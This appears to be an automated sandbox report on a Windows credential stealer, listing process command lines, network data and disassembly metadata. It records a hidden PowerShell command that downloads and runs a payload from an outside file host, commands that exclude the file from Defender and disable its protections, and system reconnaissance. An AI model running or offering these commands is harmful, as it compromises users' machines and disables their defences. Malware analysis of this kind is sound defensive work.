2024-12-23 05:42:09 UTC	16355	OUT	Data Raw: 49 0c 6a bb 64 fd 30 7c df 70 af 8d 1c 5d 7d 30 9c d3 fe f5 0a 6e 2b 98 37 51 e6 b9 78 8a 9c aa 7c 4e 10 fe 69 25 59 ca 86 5e 1f f8 e6 1b ca bc dd 28 0b 65 07 12 4b 8f b3 3b 24 45 9b 6e 6b 3b f5 f0 a7 66 46 cb c0 2f dc eb 3f de 7b ad 4d dc 3e bd 28 73 84 cf 9b 34 5c f9 e2 db 33 de 8f 9c fd e2 d9 27 7a 7f fb ba a3 84 ca 01 36 8e fd 6f 1c 94 33 94 ce a6 88 ff cb 85 02 1e 1c 37 6c 8c db fd b2 32 6d 41 c3 18 a8 62 fd dc b3 ed 68 3c d2 aa 00 b8 88 9d 14 9a 0a ca 6c cc 43 46 46 87 97 3d 74 0a cf fb ea c2 cd 71 68 3b 05 9c e1 8c ab 9c de cb fe f9 f2 34 e0 90 85 2e a1 8f 2b 80 c6 38 db 10 fa 6a c1 9f 37 df 85 89 68 43 71 96 db bd 73 dc c8 7f 3a d9 94 d6 5d 24 86 a8 bf 38 3b 91 ab 6b ae cf 5d d4 69 f5 dd cc f2 a7 f8 2c e2 90 dc a2 c8 fd 4a 00 b2 f8 04 4f 86 20 1e Data Ascii: Ijd0\|p]}0n+7Qx\|Ni%Y^(eK;$Enk;fF/?{M>(s4\3'z6o37l2mAbh<lCFF=tqh;4.+8j7hCqs:]$8;k]i,JO
2024-12-23 05:42:09 UTC	16355	OUT	Data Raw: 38 0e f7 fe e3 9f 51 1e 7b f8 b2 56 81 25 42 40 2c 3d b1 3b de 91 69 43 de 49 79 0c 35 5c 70 23 dd 41 d8 a9 7a dd 12 4c 0e 86 48 35 9f c8 f5 ac 42 a2 19 b7 5e 72 cd 66 87 f7 5d 32 98 d6 eb 32 98 d7 dd f0 b2 a1 26 6e 38 da 2b 81 13 83 f2 16 9f 6b 99 37 7a e5 a1 31 57 ec 47 b4 8e c6 c6 a4 14 37 23 2e 39 46 ea f0 f2 8e 6a 96 e8 f7 b7 46 63 af ec f8 b5 a4 fa f5 a8 0b a6 e3 21 37 44 48 25 c5 96 65 5b 51 c6 3f da a5 ba 8c da f2 d6 36 75 c8 39 80 d1 9e 34 e0 d6 8a 5c e7 cb 53 89 d6 51 04 8e 78 50 6c 71 0b 7b dc d1 f4 e1 bc ef 25 0c 68 54 de 02 aa 71 33 0b 8a 2b e6 92 8f 67 06 c1 03 6d b7 a4 41 ba 67 ea 77 d2 cc bf ea f9 0b 56 c8 9b 1a 42 6e 24 87 41 f5 0b 72 06 e9 26 01 e9 11 e8 3d 5c 45 44 8f 5b dc 6f 16 5b c1 95 a9 18 d7 59 bf 7f 54 bd 5e f2 b6 4e cd 5a 20 25 Data Ascii: 8Q{V%B@,=;iCIy5\p#AzLH5B^rf]22&n8+k7z1WG7#.9FjFc!7DH%e[Q?6u94\SQxPlq{%hTq3+gmAgwVBn$Ar&=\ED[o[YT^NZ %
2024-12-23 05:42:09 UTC	16355	OUT	Data Raw: 57 4f a2 22 be a1 e0 27 16 7c c7 c2 de 77 cb 49 55 12 5f 22 ad 29 cb 41 f7 7f f6 f7 97 25 d1 d6 29 16 87 2d d9 6a ce 99 d7 fc 8e 1e 4e 86 60 fb a7 8f 84 4b 02 db dc c6 9d 57 5b 36 2f 3f ef eb 9d af 08 c3 f9 c1 df 7f dc 66 d4 6e 56 6c 12 1b e7 fc 14 e9 a9 9b 48 7f 69 60 5a f8 3b 4e 9d 45 7c 6c c5 f5 6f f4 03 5c cf a3 a5 b1 72 92 f0 d5 bd 8d 72 52 1e 9e f2 7b f9 4a 0b bd 41 eb 3c 18 31 aa f1 72 7b 67 ae 66 97 4f cd 81 66 71 e9 4d 1d 1a e6 4b bb 3f f3 96 7c f0 eb f5 f0 a7 58 94 a2 6f fd cc 0c 01 33 35 bc 28 a4 3a 46 8e 3e fe f8 a8 e9 e9 f7 da 37 28 ba 17 dd bb 79 af fa d1 74 ed f7 60 0f aa 5f 7d cf 3c 09 e9 1e d5 04 7f 77 36 fb d0 e9 79 f5 be 01 f0 13 77 ab 90 64 fa d3 0c 28 b3 80 06 33 30 38 23 96 db 97 03 77 55 28 ee 4a 42 08 09 0f 57 fa d2 0b c2 91 ae ad Data Ascii: WO"'\|wIU_")A%)-jN`KW[6/?fnVlHi`Z;NE\|lo\rrR{JA<1r{gfOfqMK?\|Xo35(:F>7(yt`_}<w6ywd(308#wU(JBW
2024-12-23 05:42:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-23 05:42:11 UTC	1005	IN	HTTP/1.1 404 Not Found Date: Mon, 23 Dec 2024 05:42:11 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1734932532 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKa8aiqY%2F060xm6oE%2B4dhFEH0%2BRwmjhR0j0CjRnbRbz3a50DLwvnMIRMvsgkN3pgfLEzQEtWlb14D8WYinGyChDezfxv8oFwuX3R997qi0GargkJ9o1y46ruRZV8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Server: cloudflare CF-RAY: 8f6606d70dca18c4-EWR {"message": "Unknown Webhook", "code": 10015}

Target ID:	0
Start time:	00:41:00
Start date:	23/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:41:00
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:41:06
Start date:	23/12/2024
Path:	C:\Users\user\Downloads\setup_x86.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Downloads\setup_x86.exe"
Imagebase:	0x1f316940000
File size:	190'464 bytes
MD5 hash:	E09F55D421CB45340A8C97C217BA56CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\Downloads\setup_x86.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:41:09
Start date:	23/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:41:09
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:41:12
Start date:	23/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:41:21
Start date:	23/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:41:21
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:41:28
Start date:	23/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic.exe" os get Caption
Imagebase:	0x7ff746060000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:41:28
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:41:29
Start date:	23/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic.exe" computersystem get totalphysicalmemory
Imagebase:	0x7ff746060000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	00:41:29
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:41:30
Start date:	23/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic.exe" csproduct get uuid
Imagebase:	0x7ff746060000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:41:30
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:41:30
Start date:	23/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:41:30
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:41:43
Start date:	23/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic" path win32_VideoController get name
Imagebase:	0x7ff746060000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:41:43
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:41:43
Start date:	23/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct \| Select-Object -ExpandProperty displayName
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	00:41:43
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFD348C3605 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2217426759.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 21dd5bd048c7d956c600cd7e3f1633b720d6580a7015e4697539a30bd8990906
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: EF01677121CB0C4FD744EF4CE491AA5B7E0FB99364F10056EE58AC3651D636E882CB45

Analysis Process: setup_x86.exePID: 1220, Parent PID: 6872COMMON

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34A91191 Relevance: 34.1, Strings: 26, Instructions: 1578
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H\b(, xrefs: 00007FFD34A91859
P\b(, xrefs: 00007FFD34A91A89
8\b(, xrefs: 00007FFD34A916AC
X\b(, xrefs: 00007FFD34A91A6B
h\b(, xrefs: 00007FFD34A91BB3
`\b(, xrefs: 00007FFD34A91CFA
p\b(, xrefs: 00007FFD34A91EB3
H\b(, xrefs: 00007FFD34A918BE
@\b(, xrefs: 00007FFD34A919B2
`\b(, xrefs: 00007FFD34A91C36
@\b(, xrefs: 00007FFD34A918DC
h\b(, xrefs: 00007FFD34A91C18
\b(, xrefs: 00007FFD34A91582
8\b(, xrefs: 00007FFD34A91711
0\b(, xrefs: 00007FFD34A9172F
P\b(, xrefs: 00007FFD34A91B5F
(\b(, xrefs: 00007FFD34A91564
x\b(, xrefs: 00007FFD34A91DBF
X\b(, xrefs: 00007FFD34A91A06
(\b(, xrefs: 00007FFD34A914FF
0\b(, xrefs: 00007FFD34A91805
\b(, xrefs: 00007FFD34A91658
x\b(, xrefs: 00007FFD34A91D5A
H\b(, xrefs: 00007FFD34A918AC
`\b(, xrefs: 00007FFD34A91D0C
p\b(, xrefs: 00007FFD34A91DDD

Memory Dump Source

Source File: 00000003.00000002.2893602602.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd34a80000_setup_x86.jbxd

Similarity

API ID:
String ID: \b($ \b($(\b($(\b($0\b($0\b($8\b($8\b($@\b($@\b($H\b($H\b($H\b($P\b($P\b($X\b($X\b($`\b($`\b($`\b($h\b($h\b($p\b($p\b($x\b($x\b(
API String ID: 0-1020343935
Opcode ID: 688bb87330613049b47dc0f07f7cdd10d052dc447d90d4833c438a3f0ba251a6
Instruction ID: 88213c6d8f680f236609bd9bfcdc52ada3db7d054eec30b5b219c84083765bf6
Opcode Fuzzy Hash: 688bb87330613049b47dc0f07f7cdd10d052dc447d90d4833c438a3f0ba251a6
Instruction Fuzzy Hash: 2FB23872B0DA8A4FE799DB7884A91B57BD1EF56324B1801FED049CB1E2ED2C6C42C741

Function 00007FFD348CBE75 Relevance: 23.5, Strings: 18, Instructions: 982
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@9b(, xrefs: 00007FFD348CC228
X9b(, xrefs: 00007FFD348CC276
8b(, xrefs: 00007FFD348CC10A
(9b(, xrefs: 00007FFD348CC1DA
09b(, xrefs: 00007FFD348CC1F4
p8b(, xrefs: 00007FFD348CBF87
9b(, xrefs: 00007FFD348CC1C0
x9b(, xrefs: 00007FFD348CC33E
_K_L, xrefs: 00007FFD348CC574
p9b(, xrefs: 00007FFD348CC324
P9b(, xrefs: 00007FFD348CC25C
`9b(, xrefs: 00007FFD348CC2EB
x8b(, xrefs: 00007FFD348CBF9E
H9b(, xrefs: 00007FFD348CC242
8b(, xrefs: 00007FFD348CC0F0
h9b(, xrefs: 00007FFD348CC30A
89b(, xrefs: 00007FFD348CC20E
b(, xrefs: 00007FFD348CC2AE

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: 9b($ b($(9b($09b($89b($@9b($H9b($P9b($X9b($_K_L$`9b($h9b($p8b($p9b($x8b($x9b($8b($8b(
API String ID: 0-718742539
Opcode ID: 4fc39a0caa70824633c5537ae9578e3e03808d04baa85a456d0169beb0b12f78
Instruction ID: d10cedfb4718ebb07c7d7966e9679bdfc6326f313ac20f539ac918ffff6bb658
Opcode Fuzzy Hash: 4fc39a0caa70824633c5537ae9578e3e03808d04baa85a456d0169beb0b12f78
Instruction Fuzzy Hash: 3E72C570A0DA899FD755DFA884626AABBE1FF56310F2805BED049C72D7DA3CAC01C741

Function 00007FFD348D1C8D Relevance: 18.9, Strings: 14, Instructions: 1422
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P^b(, xrefs: 00007FFD348D1CFF
X^b(, xrefs: 00007FFD348D2D10
`^b(, xrefs: 00007FFD348D1EED
h^b(, xrefs: 00007FFD348D20A4
X^b(, xrefs: 00007FFD348D283D
P^b(, xrefs: 00007FFD348D1FCA
Hcz4, xrefs: 00007FFD348D20B6
`^b(, xrefs: 00007FFD348D20C8
x^b(, xrefs: 00007FFD348D2B88
P^b(, xrefs: 00007FFD348D2860
X^b(, xrefs: 00007FFD348D2D01
x^b(, xrefs: 00007FFD348D2C60
h:b(, xrefs: 00007FFD348D1CD3
X^b(, xrefs: 00007FFD348D1D11

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: Hcz4$P^b($P^b($P^b($X^b($X^b($X^b($X^b($`^b($`^b($h:b($h^b($x^b($x^b(
API String ID: 0-4032744348
Opcode ID: bae67c9282092d1e7cd93a4612351da1271963cdfa9a351d0fa4b5a2cd24ac84
Instruction ID: d58aeebfb727da8beef48a75efc60d07d3b082da058c8087f8627dff36229ba1
Opcode Fuzzy Hash: bae67c9282092d1e7cd93a4612351da1271963cdfa9a351d0fa4b5a2cd24ac84
Instruction Fuzzy Hash: 6DA20731A0EA8A4FD795DF6888A56B97BE1FF97310F0402FED449C7192DE2CA846C741

Function 00007FFD348DBA9D Relevance: 9.6, Strings: 7, Instructions: 862
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

``b(, xrefs: 00007FFD348DC52D
U, xrefs: 00007FFD348DC4F9
`b(, xrefs: 00007FFD348DBC38
X`b(, xrefs: 00007FFD348DC354
(`b(, xrefs: 00007FFD348DBC14
P`b(, xrefs: 00007FFD348DC342
Hcz4, xrefs: 00007FFD348DBC26

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: `b($(`b($Hcz4$P`b($U$X`b($``b(
API String ID: 0-4058878681
Opcode ID: 5dacc7afa5490a5a4c621d682b3e03815622c8272b2008fdd6742d6a53db562b
Instruction ID: e23df340c319b522a26ceee7bbecca08be1f248f0c09a78dae2fb239031c85db
Opcode Fuzzy Hash: 5dacc7afa5490a5a4c621d682b3e03815622c8272b2008fdd6742d6a53db562b
Instruction Fuzzy Hash: AE520571A0FBCA4FD796DB7888A55A57BE1EF47320F0802FAD449CB193DA2C6846C741

Function 00007FFD348CF468 Relevance: 9.4, Strings: 7, Instructions: 692
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`_b(, xrefs: 00007FFD348D7298
x6b(, xrefs: 00007FFD348D7096
x6b(, xrefs: 00007FFD348D7077
P_b(, xrefs: 00007FFD348D719A
x6b(, xrefs: 00007FFD348D6D86
Hcz4, xrefs: 00007FFD348D7286
h_b(, xrefs: 00007FFD348D7274

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: Hcz4$P_b($`_b($h_b($x6b($x6b($x6b(
API String ID: 0-1509952548
Opcode ID: 024e0c5955edea692a003f50c29674e50f40a0e1aff8919903b643b838df77af
Instruction ID: f7e9140e86ba39f66a2582faa0515749e2eab250525a12ab4fc49fa15fc5981f
Opcode Fuzzy Hash: 024e0c5955edea692a003f50c29674e50f40a0e1aff8919903b643b838df77af
Instruction Fuzzy Hash: FB224A31B0EA4A4FE798EF6884A56B977D1FF87310F14417ED44AC72D6DE2CA8428741

Function 00007FFD348D9EED Relevance: 7.4, Strings: 3, Instructions: 3614COMMON

Download Yara Rule

Strings

c(, xrefs: 00007FFD3490B6D3
bG_H, xrefs: 00007FFD3490C271
nG_H, xrefs: 00007FFD3490CDC1

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: c($bG_H$nG_H
API String ID: 0-3149364728
Opcode ID: 04732b44a5a73f228790170fbe4f4dfb82776f4ae167a638de4320fddfcdf91f
Instruction ID: cda452e0687a11001123126b3ec25612a17d8061e93dde0fe3d433c10fabb5cf
Opcode Fuzzy Hash: 04732b44a5a73f228790170fbe4f4dfb82776f4ae167a638de4320fddfcdf91f
Instruction Fuzzy Hash: CD535E7461CB858FD7B8DB18C4A5AAA73E1FF99304F10457ED58DC3295CE38A842DB82

Function 00007FFD348DEA08 Relevance: 7.3, Strings: 5, Instructions: 1090
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hcz4, xrefs: 00007FFD348DEEF6
P`b(, xrefs: 00007FFD348DEE0A
YJ_^, xrefs: 00007FFD348DEB01
h`b(, xrefs: 00007FFD348DEEE4
``b(, xrefs: 00007FFD348DEF08

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: Hcz4$P`b($YJ_^$``b($h`b(
API String ID: 0-266096424
Opcode ID: cadce44d4f9fd98ec5b3318b6e0d6099549e4302154447984e02626750e1ddea
Instruction ID: ce098bc408c21c392a776a0760ec4027df0a8bdab9982d0c3c485b76345b332f
Opcode Fuzzy Hash: cadce44d4f9fd98ec5b3318b6e0d6099549e4302154447984e02626750e1ddea
Instruction Fuzzy Hash: F672F531B0AA4A4FDB95EF6CC8A06F977E1FF96310B1442BAD549C7193DE38A846C740

Function 00007FFD348D337D Relevance: 4.7, Strings: 3, Instructions: 975COMMON

Download Yara Rule

Strings

J_H, xrefs: 00007FFD348D3670
^b(, xrefs: 00007FFD348D3F9D
Hcz4, xrefs: 00007FFD348D3786

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: Hcz4$J_H$^b(
API String ID: 0-868886315
Opcode ID: d6addf56671b0db1d377d0fd21bd9151028e3911dc01a8f16b03b31da39fabae
Instruction ID: ab3b13dd73a044dcfe0cd9a40b7d68002ee1e8922deb69d701d529e662c6295e
Opcode Fuzzy Hash: d6addf56671b0db1d377d0fd21bd9151028e3911dc01a8f16b03b31da39fabae
Instruction Fuzzy Hash: 6562F272A0E7CA4FD756DB7488655A97FF1EF47320F0902FAD489CB192DA2C580AC742

Function 00007FFD34A90621 Relevance: 4.5, Strings: 3, Instructions: 729COMMON

Download Yara Rule

Strings

x6b(, xrefs: 00007FFD34A90CA4
x6b(, xrefs: 00007FFD34A90C6D
x6b(, xrefs: 00007FFD34A90BD7

Memory Dump Source

Source File: 00000003.00000002.2893602602.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd34a80000_setup_x86.jbxd

Similarity

API ID:
String ID: x6b($x6b($x6b(
API String ID: 0-919339267
Opcode ID: cb97ea6da879b9b255d0ad052c2953eb9125cb4a8929cfc9288d5e0605588eef
Instruction ID: 314fbe65832b068d5bb3dd236946a3726d44d002d267028c03cc7b925f755723
Opcode Fuzzy Hash: cb97ea6da879b9b255d0ad052c2953eb9125cb4a8929cfc9288d5e0605588eef
Instruction Fuzzy Hash: FC325B31A0D68A5FD751EB7898B12E97BA0FF46324F1801BAD18CCB193DA3C6846D791

Function 00007FFD348D4CFB Relevance: 4.5, Strings: 3, Instructions: 723COMMON

Download Yara Rule

Strings

_b(, xrefs: 00007FFD348D4F58
Hcz4, xrefs: 00007FFD348D4F46
(_b(, xrefs: 00007FFD348D4F34

Memory Dump Source

